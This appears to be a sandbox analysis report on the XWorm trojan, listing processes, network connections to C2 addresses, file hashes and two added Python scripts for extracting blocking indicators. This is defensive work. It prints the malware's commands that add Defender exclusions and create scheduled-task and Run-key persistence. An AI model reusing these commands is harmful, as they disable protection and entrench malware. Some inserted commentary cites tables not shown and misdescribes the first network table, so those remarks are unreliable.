"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm V5.2'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWorm V5" /tr "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
NL 154.61.71.50:7000 tcp
NL 154.61.71.50:7000 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
SA 31.167.24.129:7000 tcp
SA 31.167.24.129:7000 tcp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
SA 2.90.87.156:7000 tcp
SA 2.90.87.156:7000 tcp
SA 2.90.87.156:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
SA 31.167.24.129:7000 tcp
SA 31.167.24.129:7000 tcp
AE 86.96.100.98:7000 tcp
AE 86.96.100.98:7000 tcp
SA 31.167.24.129:7000 tcp
SA 31.167.24.129:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
AE 86.96.100.98:7000 tcp
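The network tables of behavioral19 and behavioral20 show the same shape: one ip-api.com lookup, then repeated TCP connections to four raw IPs that all listen on port 7000, cycled in no fixed order. The table in the first process tree above has the same port but every row goes to 127.0.0.1, so that run produced no external indicator at all. The Python below is an added example, not part of the sandbox report: it parses the table rows, groups the raw-IP connections by port, and reports whether the client is rotating through a fallback host list, whether the C2 is loopback-only, and which rows are the IP lookup or platform background. The inputs are copied from the tables above; treating g.bing.com and the in-addr.arpa lookups as background is my assumption, supported by their presence in the signature-free rundll32 runs in this report.

```python
"""Beacon-destination summary for the Network tables in this report. Added
example; not part of the sandbox output."""
import ipaddress
from collections import Counter

# Public "what is my IP" services; ip-api.com is the one this sample uses.
IP_LOOKUP_SERVICES = {"ip-api.com", "ipinfo.io", "api.ipify.org", "icanhazip.com"}
# Also seen in this report's signature-free rundll32 runs: treated as sandbox/OS
# background rather than sample activity (assumption).
BACKGROUND_NAMES = {"g.bing.com"}

# Constructed input 1: the Network table of behavioral19 above, copied verbatim.
BEHAVIORAL19_NET = """
Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
SA 31.167.24.129:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
AE 86.96.100.98:7000 tcp
NL 154.61.71.50:7000 tcp
NL 154.61.71.50:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
SA 31.167.24.129:7000 tcp
SA 2.90.87.156:7000 tcp
NL 154.61.71.50:7000 tcp
AE 86.96.100.98:7000 tcp
AE 86.96.100.98:7000 tcp
SA 2.90.87.156:7000 tcp
AE 86.96.100.98:7000 tcp
""".strip().splitlines()

# Constructed input 2: excerpt of the first Network table above (the report has
# 74 loopback rows; three are enough to show the classification).
LOOPBACK_NET = """
Country Destination Domain Proto
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:80 www.example.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
""".strip().splitlines()


def parse_rows(lines):
    """Rows are 'Country ip:port [domain] proto'; the domain column is optional."""
    rows = []
    for line in lines:
        parts = line.split()
        if len(parts) not in (3, 4) or parts[0] == "Country":
            continue
        ip, port = parts[1].rsplit(":", 1)
        rows.append((ip, int(port), parts[2] if len(parts) == 4 else None, parts[-1]))
    return rows


def summarize(lines):
    rows = parse_rows(lines)
    hits = Counter((ip, port, proto) for ip, port, _, proto in rows)
    named = {(ip, port, proto): d for ip, port, d, proto in rows if d}
    c2 = {}
    for (ip, port, proto), n in hits.items():
        # C2 candidates: TCP to a raw IP (no name resolved) on a non-web port.
        if (ip, port, proto) in named or proto != "tcp" or port in (80, 443):
            continue
        c2.setdefault(port, {})[ip] = n
    c2_ips = [ip for hosts in c2.values() for ip in hosts]
    return {
        "c2_by_port": {port: dict(sorted(hosts.items())) for port, hosts in sorted(c2.items())},
        "fallback_hosts": any(len(hosts) > 1 for hosts in c2.values()),
        "loopback_c2": bool(c2_ips) and all(ipaddress.ip_address(ip).is_loopback for ip in c2_ips),
        "external_ip_lookup": any(d in IP_LOOKUP_SERVICES for d in named.values()),
        "background": sorted({d for d in named.values()
                              if d in BACKGROUND_NAMES or d.endswith(".in-addr.arpa")}),
    }


if __name__ == "__main__":
    for name, table in (("behavioral19", BEHAVIORAL19_NET), ("first tree", LOOPBACK_NET)):
        print(name, summarize(table))
```

The per-host counts matter for blocking: with four hosts on one port and no preferred order, blocking a single IP only moves the beacon to the next entry, so the whole set goes on the block list together, and a loopback-only result means that run carries no network indicator at all.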

Files

memory/4444-0-0x00007FFD673D3000-0x00007FFD673D5000-memory.dmp

memory/4444-1-0x0000000000D80000-0x0000000000DB4000-memory.dmp

memory/4444-2-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

memory/3708-3-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

memory/3708-4-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qisji2os.5ar.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3708-11-0x000002AD71A80000-0x000002AD71AA2000-memory.dmp

memory/3708-16-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4fc1ceefa94c82f73b7ee478e2920ea3
SHA1 17a031c8d10e316478d85d24ba8a8b5ebfda3149
SHA256 018553e7801fd476285775a4df59eb6a6c79774f6253d6dcbe9e4e96de3c96fb
SHA512 cd581f4b96e1eff3e1c8e75e9e67050060f9bdc92c2a4a0ca8282b4b1839fde9f7848cc262b8ef189466bdd51c0940be7392ae7f0278b2113d10ed590d11b311

memory/4444-53-0x00007FFD673D3000-0x00007FFD673D5000-memory.dmp

memory/4444-54-0x00007FFD673D0000-0x00007FFD67E91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

MD5 b2234a1b2a6b4b0e9bfbeeb540e86725
SHA1 d1e45aa8f1136a8809837ad72943dc7e580767e1
SHA256 d1ee800872c14d799d38ab0fb08b1d3c6573cef795f8c3eb9e3066e106e3dabb
SHA512 946eebfb60ea5081f59e9f31a56097564cc52e2b688b77d37eecbca3519e1122c872c98a129f27dc86a4032ef18ca4a98f1ddbdd283076e2e880d17bf63149f5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWorm V5.2.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
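The Files sections in this report mix the sample's dropped payloads (Output.exe, Downloader.hta, XClient.exe, the `XWorm V5.2` copy) with side effects of the host itself: the `\??\PIPE\srvsvc` entry carries the hashes of zero bytes, `__PSScriptPolicyTest_*.ps1` and `StartupProfileData-NonInteractive` are written by PowerShell whenever it starts, the `CustomDestinations` jump list and the `CLR_v4.0\UsageLogs` file are OS bookkeeping. Copying the whole table into a block list would ship an empty-file hash and benign paths as indicators. The Python below is an added example, not part of the sandbox output: it parses the path/hash blocks from the sections above, computes the empty-file hash instead of hard-coding it, drops the noise entries, and returns the payloads with their SHA-256. The input is copied from the two Files sections above; the noise patterns are my classification.

```python
"""File-IOC extraction for the Files sections of this report. Added example;
not part of the sandbox output."""
import hashlib
import re
from fnmatch import fnmatchcase

# SHA-256 of zero bytes: a named pipe or empty file hashed by the sandbox,
# never a meaningful indicator.
EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()

# Artefacts of running PowerShell/.NET on the host, not files the sample dropped
# (my classification, based on the paths this report shows).
NOISE_GLOBS = (
    r"\??\PIPE\*",
    r"*\__PSScriptPolicyTest_*.ps1",
    r"*\PowerShell\StartupProfileData-NonInteractive",
    r"*\Recent\CustomDestinations\*.customDestinations-ms",
    r"*\CLR_v4.0\UsageLogs\*.log",
)
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")

# Constructed input: entries copied from the Files sections above. SHA1 and
# SHA512 lines are left out here; the parser accepts any subset of hash lines.
SAMPLE_FILES = r"""
memory/2572-0-0x000007FEF6183000-0x000007FEF6184000-memory.dmp

C:\Users\Admin\AppData\Roaming\Output.exe

MD5 a731d63dc3edd963b906d0f861f7119c
SHA256 94e34e1ab4c0941edda34585cb048af9b4bf4a8e3e9042e3986b597b839f4dad

C:\Users\Admin\AppData\Roaming\Downloader.hta

MD5 f27fe2354ebb52cffbb3a8cf66c6bdb3
SHA256 30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 f065a5f352973e89b2e8d3efd79b98f8
SHA256 7b75950ae4eeabfdedafe9e3b14acee160a6ad932cbad66f71fe5bca32cc6405

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qisji2os.5ar.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2

MD5 b2234a1b2a6b4b0e9bfbeeb540e86725
SHA256 d1ee800872c14d799d38ab0fb08b1d3c6573cef795f8c3eb9e3066e106e3dabb
""".strip().splitlines()


def parse_files(lines):
    """Group each path line with the hash lines that follow it."""
    entries, current = [], None
    for line in (raw.strip() for raw in lines):
        if not line or line in ("Files", "N/A"):
            continue
        m = HASH_RE.match(line)
        if m:
            if current is not None:
                current["hashes"][m.group(1)] = m.group(2).lower()
        elif line.startswith("memory/"):
            current = None      # memory-dump reference, nothing to hash
        else:
            current = {"path": line, "hashes": {}}
            entries.append(current)
    return entries


def is_noise(entry):
    path = entry["path"].lower()
    if any(fnmatchcase(path, glob.lower()) for glob in NOISE_GLOBS):
        return True
    return entry["hashes"].get("SHA256") == EMPTY_SHA256


def file_iocs(lines):
    """(path, sha256) for every dropped file worth blocking or hunting for."""
    return [(e["path"], e["hashes"].get("SHA256"))
            for e in parse_files(lines) if e["hashes"] and not is_noise(e)]


if __name__ == "__main__":
    for path, sha256 in file_iocs(SAMPLE_FILES):
        print(sha256, path)
```

The glob list is deliberately narrow: it names the exact host artefacts seen in this report rather than excluding whole directories, because the sample itself writes to the same `AppData` tree and a broad exclusion would hide the payload copies.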

Analysis: behavioral10

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:31

Platform

win10v2004-20240802-en

Max time kernel

436s

Max time network

442s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:33

Platform

win10v2004-20240802-en

Max time kernel

437s

Max time network

441s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:33

Platform

win7-20240708-en

Max time kernel

598s

Max time network

363s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\q11111 = "C:\\Users\\Public\\q11111" C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\q11111 N/A (10 identical rows)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1716 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 2236 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 808 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe
PID 1308 wrote to memory of 1324 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2924 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2768 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2216 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1916 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2140 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 3028 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2232 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 2604 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111
PID 1308 wrote to memory of 1300 N/A C:\Windows\system32\taskeng.exe C:\Users\Public\q11111

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe

"C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\q11111'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"

C:\Windows\system32\taskeng.exe

taskeng.exe {D062D8EC-1716-411D-9AFC-EC10BBE39E0C} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]

C:\Users\Public\q11111 (10 identical process instances)

C:\Users\Public\q11111

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:7000 N/A tcp (75 identical rows)

Files

memory/1716-0-0x000007FEF55F3000-0x000007FEF55F4000-memory.dmp

memory/1716-1-0x00000000000B0000-0x0000000001632000-memory.dmp

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 767d4d113ea2e9d9886b2aa1710db7f3
SHA1 f7f779a94fb6fe0e3ee8996dff7951b3b5c7b1b0
SHA256 b06506ca596951ae4c75e43d5aba7c255c557cf5607915a214c2a3f53e97934f
SHA512 ea1f6b926b2e19d0521dc3939c247094640ba6fb10b8c0a4dbb48306c5b7e8b9a3659d4f83ead234ba3c035ae09d891d8c2c302945f48b94a4a0916d3ca7ee41

memory/2236-8-0x0000000001240000-0x0000000001290000-memory.dmp

memory/2236-16-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

memory/2236-47-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

memory/2608-52-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2608-53-0x0000000002240000-0x0000000002248000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 37835441f2ee036da3d495d723d1b9fa
SHA1 9b819bfae003e47693865ff63e0026a33d44db71
SHA256 ae52a0e97d8add2a61d621f152c1d08a0870513096c5f0e4bc2af6ca7d842a56
SHA512 b4326f7e2103eb69207a8ab046b8012d0f70b1143c2b916c611dce7fa6974df37f1259d9ed5e700b206e5d25a279b2913e45e833ebaec41d83d917d8a455e30e

memory/808-59-0x000000001B660000-0x000000001B942000-memory.dmp

memory/808-60-0x0000000002260000-0x0000000002268000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2236-75-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

memory/1324-79-0x0000000001320000-0x0000000001370000-memory.dmp

memory/2924-82-0x0000000000230000-0x0000000000280000-memory.dmp

memory/2768-84-0x0000000000CB0000-0x0000000000D00000-memory.dmp

memory/2216-86-0x0000000001150000-0x00000000011A0000-memory.dmp

memory/1916-88-0x0000000001340000-0x0000000001390000-memory.dmp

memory/2232-92-0x0000000000190000-0x00000000001E0000-memory.dmp

memory/2604-94-0x0000000000390000-0x00000000003E0000-memory.dmp

memory/1300-96-0x0000000000B90000-0x0000000000BE0000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:39

Platform

win10v2004-20240802-en

Max time kernel

436s

Max time network

439s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 136.71.105.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:39

Platform

win7-20240708-en

Max time kernel

361s

Max time network

363s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:28

Platform

win10v2004-20240802-en

Max time kernel

419s

Max time network

422s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:28

Platform

win10v2004-20240802-en

Max time kernel

415s

Max time network

423s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\GMap.NET.Core.dll,#1

Network

Country Destination Domain Proto
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-02 22:42

Reported

2024-08-03 03:29

Platform

win10v2004-20240802-en

Max time kernel

434s

Max time network

437s

Command Line

